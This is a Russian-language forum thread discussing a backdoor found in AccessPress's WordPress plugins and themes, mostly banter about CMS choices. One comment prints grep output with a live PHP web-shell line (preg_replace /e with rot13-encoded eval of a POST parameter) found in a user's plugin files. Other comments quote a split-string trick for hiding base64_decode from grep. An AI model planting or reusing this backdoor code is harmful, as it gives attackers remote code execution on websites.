The OpenNET Project / Index page

[ новости /+++ | форум | wiki | теги | ]



"Бэкдор в 93 плагинах и темах оформления AccessPress, применяемых на 360 тысячах сайтов"
Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Изначальное сообщение [ Отслеживать ]

"Бэкдор в 93 плагинах и темах оформления AccessPress, применяемых на 360 тысячах сайтов"  +/
Сообщение от opennews (??), 22-Янв-22, 13:48 
Злоумышленникам удалось встроить бэкдор в 40 плагинов и 53 темы оформления для системы управления контентом WordPress, разрабатываемых компанией AccessPress, которая заявляет, что её дополнения используются на более чем 360 тысячах сайтов. Результаты разбора инцидента пока не приводятся, но предполагается, что вредоносный код удалось внедрить в ходе компрометации сайта AccessPress, внеся изменения предлагаемые для загрузки архивы с уже выпущенными релизами, так как бэкдор присутствует только в коде, распространяемом через официальный сайт AccessPress, но отсутствует в тех же выпусках дополнений, распространяемых через каталог WordPress.org...

Подробнее: https://www.opennet.ru/opennews/art.shtml?num=56560

Ответить | Правка | Cообщить модератору

Оглавление

Сообщения [Сортировка по ответам | RSS]

1. Сообщение от Аноним (1), 22-Янв-22, 13:48   +8 +/
храните ваши деньги в сберегательной кассе ©
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #9, #76, #82

2. Сообщение от Kusb (?), 22-Янв-22, 13:49   +/
С одной строны бекдор в темах это странно.
С другой - вид и поведение связаны и если в тему можно сунуть бекдор - система гибкая.
В третьих - это же веб...
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #4, #5

3. Сообщение от AccessPress (?), 22-Янв-22, 13:55   +8 +/
Не прокатило...
:-(

Ответить | Правка | Наверх | Cообщить модератору
Ответы: #40

4. Сообщение от DIO (?), 22-Янв-22, 13:56   –12 +/
и что что веб? или по вашей методичке веб - это криво? напомню, что вы как раз на вебе выср;%и каммент и когда хеловордите то пользуетесь вебом чтобы найти очередной свой хеловорд.
есть большое количество систем управления которые не страдают таким маразмом как вп но миллиарды мух не могут же ж ошЫбатся...

п.с. кстати интырпрайз еще сильно дырявее чем веб т.к. там в 90% случаев все "секурити" оставляют на растерзание нетворадминам, которые плавно превращаются в девопсов, тестеров и исправлятелей

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #2 Ответы: #6, #39, #49, #51

5. Сообщение от Аноним (6), 22-Янв-22, 13:58   –2 +/
То что система гибкая это не её плюс. То что в вордпрессе плагины и даже их версии часто прибиты гвоздями к версии не плюс. И то что темы и версии плагинов никто конечно же не обновляет после того как сдали например заказчик это факт.  

Вывод: Вордпресс — УГ.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #2 Ответы: #12, #106

6. Сообщение от Аноним (6), 22-Янв-22, 14:01   –5 +/
Так может например какой-нибудь Гугл сделает правильную CMS для всех. Ой так им же это не выгодно им выгодно поддерживать УГ, вместо которых давать свои проприетарные ресурсы как сервис.  Которые конкретно Гугл еще и закрывает постоянно.  
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #4 Ответы: #79, #140

7. Сообщение от Atterratio (ok), 22-Янв-22, 14:03   +1 +/
>закамуфлировано в виде блока данных в кодировке base64

Одно время работал в саппорте одного сервиса на котором часто хостили WP, и толковой проверки на вирусню там тогда не было, но часто банили за подозрительную активность. По инструкции мы должны в файлах такого клинта искать файлы с base64 кидать в вирус тотал и говорить у вас вирусня вот проверка. Так что что можно тут закамуфлировать)

Ответить | Правка | Наверх | Cообщить модератору
Ответы: #21, #26

8. Сообщение от Аноним (8), 22-Янв-22, 14:15   +1 +/
Не фартануло не повезло
Ответить | Правка | Наверх | Cообщить модератору

9. Сообщение от Аноним (9), 22-Янв-22, 14:21   +/
Пишите сайты на Wt.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #1 Ответы: #10, #11, #33

10. Сообщение от topin89 (ok), 22-Янв-22, 14:31   +2 +/
Тогда на асме сразу, чего мелочиться. https://asm32.info/fossil/asmbb/index
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #9 Ответы: #18, #44

11. Сообщение от Кир (?), 22-Янв-22, 14:33   –1 +/
Два чая этому господину!
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #9

12. Сообщение от Аноним (12), 22-Янв-22, 14:44   –4 +/
> Вывод: Вордпресс — УГ.

Критикуешь неправильное -- рекомендуй правильное.
Поэтому список CMS давай, которые труъ.
Ждём.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #5 Ответы: #22, #23, #30, #101

13. Сообщение от жорик (?), 22-Янв-22, 14:54   –4 +/
ох уже этот дырявый веб, больше джавы несите джаву *слюни
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #37

14. Сообщение от псевдонимус (?), 22-Янв-22, 14:55   +4 +/
Вечно с этим вордпрессом не слава богу.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #15

15. Сообщение от Аноним (12), 22-Янв-22, 15:16   +/
AccessPress -- это не WordPress.
Специалист из WordPress как раз-то и обнаружил этот бэкдор.
Везде б таких специалистов.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #14 Ответы: #38, #90

16. Сообщение от Аноним (12), 22-Янв-22, 15:26   +7 +/
> вредоносное содержимое ... закамуфлировано в виде ... base64.
> закамуфлировано

Правильный камуфляж -- это незаметный камуфляж.
А base64 посреди читаемого кода -- это как военные в зелёном камуфляже посреди белого снега.

Ответить | Правка | Наверх | Cообщить модератору
Ответы: #20

17. Сообщение от Аноним (-), 22-Янв-22, 15:27   –2 +/
а скриншоты без богомерзкой мелкостудии ну вообще никак невозможно сделать ?
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #19, #25, #144

18. Сообщение от Аноним (-), 22-Янв-22, 15:28   –1 +/
флат только для 86х . т.е ненужен
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #10 Ответы: #42, #61

19. Сообщение от Аноним (19), 22-Янв-22, 15:48   +4 +/
Сделай!
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #17

20. Сообщение от Аноним (20), 22-Янв-22, 15:50   +10 +/
Мне особенно понравилась строка:
$b64 = 'bas' . 'e64' . '_dec' . 'ode'

10 камуфляжей из 10. Это как наклейка "НЕ ШПИОН" на мундире.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #16 Ответы: #24, #29

21. Сообщение от john_erohin (?), 22-Янв-22, 15:52   +7 +/
> искать файлы с base64 кидать в вирус тотал

вирустотал лишний этап.
потроха в base64 или еще какая обфускация - сразу нахер с пляжа.
и в политике хостинга это прописать.

ps: даешь вирусный опенсорц !

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #7 Ответы: #55, #80

22. Сообщение от haha (??), 22-Янв-22, 16:13   +2 +/
Таких нет. Вся вэбня это шлак и помои. Без исключений.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #12

23. Сообщение от Аноним (23), 22-Янв-22, 16:17   +4 +/
Любой генератор статики к твоим услугам.  Например https://gohugo.io/
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #12 Ответы: #78

24. Сообщение от Ordu (ok), 22-Янв-22, 16:19   +7 +/
На эту строку не сработает grep по фразе base64_decode. Это отметает автоматические искалки странностей, основанные на grep'е. А с глазами людей, очевидно, ребята даже не пытались бороться, надеясь, что до использования глаз и мозга не дойдёт.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #20 Ответы: #27, #56

25. Сообщение от Аноним (23), 22-Янв-22, 16:19   +1 +/
Ты пропитой? Это саблайм.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #17 Ответы: #48

26. Сообщение от Аноним (23), 22-Янв-22, 16:21   +/
И все равно там дыра на дыре. Хостингам с этого плюс на бабки ставить пользователей.  
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #7

27. Сообщение от Аноним (23), 22-Янв-22, 16:21   +4 +/
Так ведь и правильно надеялись до него очень долго не доходило.  
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #24 Ответы: #85

29. Сообщение от Vacu923ek (ok), 22-Янв-22, 16:30   –1 +/
Ржу :))))))))))
Осталось написать $b64 = "это не вирус! проходите мимо".
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #20 Ответы: #68, #73

30. Сообщение от Vacu923ek (ok), 22-Янв-22, 16:33   +1 +/
Дурачкам вроде тебя не приходила мысль, что из всех существующих CMS вообще НИ ОДНА может не быть хорошей?!
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #12 Ответы: #35

31. Сообщение от user90 (?), 22-Янв-22, 16:42   +1 +/
На чом на чом оно говорите написано? Я даже не буду спрашивать кем))
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #41

33. Сообщение от Аноним (33), 22-Янв-22, 17:34   +2 +/
ВордТрест?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #9 Ответы: #45

35. Сообщение от Аноним (35), 22-Янв-22, 17:39   +/
Какое решение на замену CMS вы бы назвали хорошим?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #30 Ответы: #36, #43, #77, #87

36. Сообщение от Michael Shigorinemail (ok), 22-Янв-22, 17:48   –2 +/
Некоторые считают, что альтернатива -- утки! :)

PS: жертв wordpress, конечно, жаль каждый раз, но и предупреждали их тысячекратно; а здесь слово "access" содержится прям в названии лавочки, столь удобно его предоставившей.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #35

37. Сообщение от Michael Shigorinemail (ok), 22-Янв-22, 17:49   +4 +/
При чём _тут_ java?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #13 Ответы: #53, #81, #154

38. Сообщение от Michael Shigorinemail (ok), 22-Янв-22, 17:50   +1 +/
> Специалист из WordPress как раз-то и обнаружил этот бэкдор.

Читать умеете?

> Везде б таких специалистов.

Достаточно не прогуливать уроки, в том числе тупя в тель-афон.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #15 Ответы: #74, #92

39. Сообщение от Аноньимъ (ok), 22-Янв-22, 17:51   +5 +/
Таблетки пить не забывайте пожалуйста.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #4

40. Сообщение от Аноним (40), 22-Янв-22, 17:53   +/
...  более чем 360 тысячах сайтов
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #3 Ответы: #84

41. Сообщение от Аноним (20), 22-Янв-22, 17:53   +1 +/
Нет, не на расте. Про него соседняя новость.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #31

42. Сообщение от Аноним (9), 22-Янв-22, 17:57   +1 +/
https://www.webtoolkit.eu/wt/download
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #18 Ответы: #71

43. Сообщение от Аноньимъ (ok), 22-Янв-22, 17:57   +1 +/
Можно просто взять и отверстать сайт?
Работы буквально столько же если не меньше чем с вордпрессом.

Если нужна динамика то бекенд прикручиваешь хоть на томже жаваскрипте.

И есть же всякие, прости господи, реакты, для тех кто неосилил штмл.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #35 Ответы: #128

44. Сообщение от Аноним (9), 22-Янв-22, 17:59   –1 +/
С поддерживает ассемблерные вставки. Если для проекта формализируете, как работать с регистрами и прочим, почему бы и нет.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #10 Ответы: #72

45. Сообщение от Аноним (9), 22-Янв-22, 17:59   +/
Вообще-то Витти.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #33 Ответы: #60

46. Сообщение от Онаним (?), 22-Янв-22, 18:03   +/
Я так понимаю, эти бэкдоры ещё и продавались? :D
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #59

47. Сообщение от Аноним (47), 22-Янв-22, 18:32   –2 +/
вот тебе и любитель убунту(и любитель раста) который захотел поставить тёмную тему и нарвался на ...
Ответить | Правка | Наверх | Cообщить модератору

48. Сообщение от Аноним (-), 22-Янв-22, 18:35   +/
крякнутый ?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #25 Ответы: #52

49. Сообщение от User (??), 22-Янв-22, 18:43   +2 +/
Ну, в общем да. Имманентно присущее свойство. Слишком много уровней абстракции, слишком широко распространение слишком... Да всё слишком.
Криво, косо, уродливо, частичнополомано ну вот просто ВСЕГДА.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #4

50. Сообщение от Аноним (50), 22-Янв-22, 18:45   +/
С вебом все хорошо!
Ответить | Правка | Наверх | Cообщить модератору

51. Сообщение от keydon (ok), 22-Янв-22, 18:51   +/
Да, веб и криво это синонимы, где-то с середины 2000х (а то и раньше). Профэссор, я работаю без методичек.
> напомню, что вы как раз на вебе выср;%и каммент и когда хеловордите то пользуетесь вебом чтобы найти очередной свой хеловорд.

И что это меняет?
> кстати интырпрайз еще сильно дырявее чем веб т.к. там в 90% случаев все "секурити" оставляют на растерзание нетворадминам, которые плавно превращаются в девопсов, тестеров и исправлятелей

Фактически интырпрайз и есть веб, где-то больше, где-то меньше.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #4

52. Сообщение от Аноним (6), 22-Янв-22, 18:55   +/
Ты походу на чем-то тяжелом. Зачем Саблайм крякать он итак работает. Ты это завязывай.  
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #48 Ответы: #69

53. Сообщение от Аноним (40), 22-Янв-22, 18:57   +1 +/
Там у товарища биполярное мышление PHP vs JAVA
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #37

54. Сообщение от Аноним (40), 22-Янв-22, 19:00   +2 +/
Те кто не хотят платить за свой штат разарботчиков или хотя бы за аутсорсинг должны страдать и платить за это ... хотя бы репутацией в дальнейшем.

Другое дело, что общество настолько хитрое, что в мою бытность этих сайтошлепов развелось просто уйма и сейчас из каждого клозета рупопром трубит тильда и Битрикс360

Ответить | Правка | Наверх | Cообщить модератору
Ответы: #58

55. Сообщение от sdafaytesyaswabrostionspolizey (?), 22-Янв-22, 19:11   +/
ты так сразу все торрент трекеры закроешь, почти все антивирусы и все программы с ключами. Всё обфускация.
без лицензии выдаваемой полицией ни одного сайта не создашь. ни одного хостинга кроме полицейского не останется.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #21 Ответы: #66, #70

56. Сообщение от Аноним (56), 22-Янв-22, 19:15   +/
> надеясь, что до использования глаз и мозга не дойдёт

Или дойдет, но очень потом

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #24

58. Сообщение от sdafaytesyaswabrostionspolizey (?), 22-Янв-22, 19:21   –1 +/
это свобода. а вы предпочитаете рабство? с лицензированием каждого движения каждого человека. а ваши все программы уже лицензированы?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #54 Ответы: #62

59. Сообщение от sdafaytesyaswabrostionspolizey (?), 22-Янв-22, 19:25   +/
это зависит от количества свободы
где свободы больше там могли продаваться
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #46

60. Сообщение от дохтурЛол (?), 22-Янв-22, 19:29   +/
Вивитти (надо выйти / на репите) тогда уж.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #45

61. Сообщение от oliliputiputiputi (?), 22-Янв-22, 19:30   +2 +/
x86_64 тоже не нужен
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #18

62. Сообщение от Мент (?), 22-Янв-22, 19:59   +1 +/
Свобода - это рабство.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #58

63. Сообщение от pashev.me (?), 22-Янв-22, 19:59   +/
Latex, pandoc и hakyll - наше всё.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #75, #124

64. Сообщение от AskerTVemail (ok), 22-Янв-22, 20:02   –2 +/
На моём WP-сайте, была такая дыра:

<pre>
wp-content# grep -ir str_rot13 *

plugins/hello.php:if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/hello.php:if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/hello.php:if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/hello.php:if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/hello.php:if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/hello.php:if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/hello.php:if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/hello.php:if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/hello.php:if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/hello.php:if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/hello.php:if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/hello.php:if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/akismet/akismet.php:#if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/akismet/akismet.php:#if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/akismet/akismet.php:#if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/akismet/akismet.php:#if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/akismet/akismet.php:#if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/akismet/akismet.php:#if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/akismet/akismet.php:#if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/akismet/akismet.php:#if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/akismet/akismet.php:#if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/akismet/akismet.php:#if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/akismet/akismet.php:#if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/akismet/akismet.php:#if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
</pre>

Ответить | Правка | Наверх | Cообщить модератору
Ответы: #99

66. Сообщение от оберполицмейстер (?), 22-Янв-22, 20:15   +/
И что вы тут видите неправильным?
(Все сказанное или подуманное вами будет использовано против вас. Так что думайте аккуратнее.)

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #55

68. Сообщение от Аноним (68), 22-Янв-22, 20:59   +/
Просто много пробелов, а код весь справа за скроллом не видать уже.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #29

69. Сообщение от Аноним (-), 22-Янв-22, 21:07   +/
ты похоже даже не в курсе о чем анонче пишет. посмотри какая у тебя лицензия . или ты только второй день и тебе еще не вылетело окно счастья лол
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #52 Ответы: #110

70. Сообщение от john_erohin (?), 22-Янв-22, 21:09   –1 +/
детский сад. внтури своих виртуальных машин делайте что хотите,
любой зоопарк, только платите за потребленные ресурсы и трафик.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #55

71. Сообщение от Аноним (-), 22-Янв-22, 21:16   –3 +/
тормознутое c++ сами жрите
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #42

72. Сообщение от Аноним (-), 22-Янв-22, 21:18   +/
и куда ты их вставлять собрался ? вот конкретно, хттп сервер отдающей файл в линуксе с неизвестной фс на неизвестную карту на неизвестной платформе. расскажи мне и я повставляю
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #44 Ответы: #123, #125

73. Сообщение от Аноним (-), 22-Янв-22, 21:26   +/
> "это не вирус! проходите мимо".

я и прохожу всегда. человек старался как-никак

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #29

74. Сообщение от Kusb (?), 22-Янв-22, 21:28   +2 +/
И тель-авизор?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #38

75. Сообщение от Аноним (75), 22-Янв-22, 21:31   +1 +/
BDSM
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #63

76. Сообщение от Аноним (76), 22-Янв-22, 21:56   +3 +/
храните ваши деньги в нашей сберегательной кассе
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #1

77. Сообщение от Vacu923ek (ok), 22-Янв-22, 21:57   +2 +/
> Какое решение на замену CMS вы бы назвали хорошим?

Любое самописное. Звучит смешно, но именно свой проф.движок может 100% отвечать вашим запросам - безопасность, простота, скорость, дизайн, *правильный ЯП* и т.п. И конечно же, быть СОПРОВОЖДАЕМЫМ - ключевое свойство долгосрочных проектов.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #35 Ответы: #83

78. Сообщение от anonymous (??), 22-Янв-22, 22:00   +/
wp можно переводить в статику - итого имеет доступ к богатой экосистеме плагинов и тем без необходимости клепать велосипеды на очередном генераторе статики

curl -I http://megalanding.wordpress.site/ > index.html

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #23 Ответы: #115

79. Сообщение от YetAnotherOnanym (ok), 22-Янв-22, 22:20   +1 +/
Правильная CMS наверняка уже существует. Просто не все ещё её для себя нашли. Но попытаться стОит.
Начните вот с этого списка, для начала: https://en.wikipedia.org/wiki/List_of_content_management_sys...
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #6

80. Сообщение от YetAnotherOnanym (ok), 22-Янв-22, 22:23   +/
> обфускация - сразу нахер с пляжа

Дай я тебя обниму и расцелую!

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #21

81. Сообщение от YetAnotherOnanym (ok), 22-Янв-22, 22:24   +/
Лютого косплеит.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #37

82. Сообщение от Дегенератор (ok), 22-Янв-22, 22:59   –4 +/
Сайты нужно писать на Расте.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #1 Ответы: #91

83. Сообщение от угу (?), 22-Янв-22, 23:13   +2 +/
Звучит не смешно а печально. Опеннет скатился...

Один всерьез думает что реакт это "замена html", другой каждый день пишет "свой проф.движок", вероятно, на деньги из тумбочки...

Сколько гуглей уже написал-то?

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #77 Ответы: #116

84. Сообщение от угу (?), 22-Янв-22, 23:14   +/
Но всего на три месяца :-(

А ведь щастье было так возможно...

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #40 Ответы: #118

85. Сообщение от угу (?), 22-Янв-22, 23:16   +/
Да вроде - сразу и спалили? Долго не доходило до владельцев плагина - но если они и были авторами или во всяком случае сотрудничали - то до них и не должно было. Пока вротпресс их сам не зобанил.
(потому шта делиться надо!)

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #27 Ответы: #121

87. Сообщение от suffix (ok), 23-Янв-22, 00:03   –1 +/
Битрикс разумеется !
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #35 Ответы: #88, #138

88. Сообщение от Аноним (12), 23-Янв-22, 00:18   –1 +/
> Битрикс разумеется !

Пойдите на nic.ru, там есть бесплатный месячный пробный тариф с битриксом (ссылка доступна через FAQ про тарифы CMS-хостингов, тогда как в числе тарфов битрикса пробный почему-то отсутствует).
Зарегистрируйтесь, купите бесплатный тариф (он у них требует оплату в 1р вроде бы), установите на хостинг CMS (для этого там есть кнопка "установить CMS"), затем зайдите туда по ftp и ознакомьтесь со скриптами.

Маленькие base64 в сабже вам покажутся детским лепетом по сравнению с обфусцированным php-кодом 1C.

Также не думаю, что вы сможете как-то оценить безопасность подобной абракадабры.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #87 Ответы: #89

89. Сообщение от suffix (ok), 23-Янв-22, 00:27   –4 +/
Любезный, у меня самого сайт на Битрикс уже как 10 лет, если не больше.

В Битрикс есть встроенный модуль "Проактивная защита" - если в нём выставить всё на максимум то от кулхацкеров-школьников он гарантировано защитит.

P.S.

Я объективен - ибо сам этим модулем не пользуюсь - так как обладаю знаниями и умениями как самому всё обезопасить. Кроме того этот модуль привносит некоторую тормознутость, но для новичков - он самое оно !

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #88 Ответы: #93, #117

90. Сообщение от Аноним (91), 23-Янв-22, 00:28   +/
> ... системы управления контентом WordPress, разрабатываемых компанией AccessPress

Внимательно прочти это предложение.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #15 Ответы: #94

91. Сообщение от Аноним (91), 23-Янв-22, 00:31   +2 +/
Тогда никакой памяти не хватит из-за безопасной утечки.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #82

92. Сообщение от Аноним (12), 23-Янв-22, 00:33   –1 +/
> Читать умеете?

Во втором абзаце написано.

> > Везде б таких специалистов.
> Достаточно не прогуливать уроки, в том числе тупя в тель-афон.

Есть чёткое подозрение, что вы не представляете объёмы кода, с которыми приходится работать людям из контор, поддерживающих CMS подобной популярности.

А у AccessPress'а явный косяк в органах надзора за собственными поделиями.
И это уже не столько способность смотреть в код глазами, сколько социальная инженерия среди собственного офиса: люди должны крепко дружить друг с другом и с начальством, но при этом в случае чего -- друг на друга стучать.  Тогда таких косяков будет меньше.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #38 Ответы: #98

93. Сообщение от Аноним (12), 23-Янв-22, 00:36   –1 +/
> Любезный, у меня самого сайт на Битрикс уже как 10 лет, если не больше.

Нет у вас сайта на битриксе.
Вы вбили в яндекс запрос "битрикс защита", прочитали два первых пункта выдачи и написали с них коммент.
Это явное палево.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #89 Ответы: #95

94. Сообщение от Аноним (12), 23-Янв-22, 00:46   +/
> ... _для_ системы управления контентом WordPress, разрабатываемых компанией AccessPress ...

Внимательно прочти слово "для" в этом предложении.
AccessPress разрабатывает штуки _для_ пользователей WordPress.
А WordPress разрабатывают в Automatic.

> Наличие вредоносных изменений было выявлено исследователем из компании JetPack (подразделение компании Automatic, занимающейся разработкой WordPress)

Это предложение тоже прочти внимательно.  И Мише скажи, чтобы прочитал.
Мож так понятнее станет.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #90 Ответы: #97

95. Сообщение от suffix (ok), 23-Янв-22, 00:50   –1 +/
Даже по нику моему ткнуть лень было :) ?

Или поиском по комментариям моим что здесь на опеннете, что на лоре, что на сёрче пробежаться (ник у меня везде одинаковый) ?

Я не шифруюсь ни разу !

Детский сад право - зачем мне в такой мелочи что-то придумывать ?

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #93

96. Сообщение от Аноним (91), 23-Янв-22, 00:57   +1 +/
> бэкдор для системы управления контентом WordPress

Опять WordPress...

Ответить | Правка | Наверх | Cообщить модератору

97. Сообщение от Аноним (91), 23-Янв-22, 01:01   +/
Ты какой-то странный... Что тебе не понятно в слове WordPress? Почему ты его не хочешь замечать?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #94 Ответы: #100

98. Сообщение от Аноним (91), 23-Янв-22, 01:03   –2 +/
> у AccessPress'а явный косяк

У WordPress явный косяк, если он ломается троянами из темы оформления.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #92 Ответы: #103

99. Сообщение от Аноним (12), 23-Янв-22, 01:04   –3 +/
Это не дыра, а это результат предельно топорного взлома, проводимого либо установкой скриптов из непроверенных источников, либо от хитрых заказчиков с бирж фриланса: заказчик просит починить тему (реже плагин), но с условием показа починенной темы на ваших мощностях, потому что у заказчика дескать нет свободного хостинга.

Поэтому вы выполняете банальную починку, заливаете на сайт, демонстрируете работающую тему, и получаете обещанный килорубль.

При этом, если у вас нет ограничения на предельную глубину файлового дерева, к которой имеют доступ php-скрипты, все сайты под вашей учётной записью на этом хостинге окажутся скомпрометированы: среди сотен php-скриптов будут как левые, содержащие некое подобие шелла и/или бд-клиента, так и штатные, дополненные аналогичными бэкдорами (как в данном случае).

А для WP ограничить глубину файлового дерева нельзя, потому как иначе невозможен будет залив картинок и других вложений.

Мораль басни: не используйте левые скрипты из непроверенных источников, включая заказчиков на биржах фриланса.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #64 Ответы: #105

100. Сообщение от Аноним (12), 23-Янв-22, 01:06   –1 +/
Косяк не в WordPress'е найден.
Перечитай новость.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #97 Ответы: #102

101. Сообщение от Аноним (91), 23-Янв-22, 01:06   –1 +/
> Критикуешь неправильное -- рекомендуй правильное.

Дурачок, а при создании тикета на баг тоже надо сразу предлагать решение?

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #12

102. Сообщение от Аноним (91), 23-Янв-22, 01:09   +/
Какая архитектура - такие и косяки. Ты до сих пор не смог прочитать фразу "бэкдор для WordPress"?
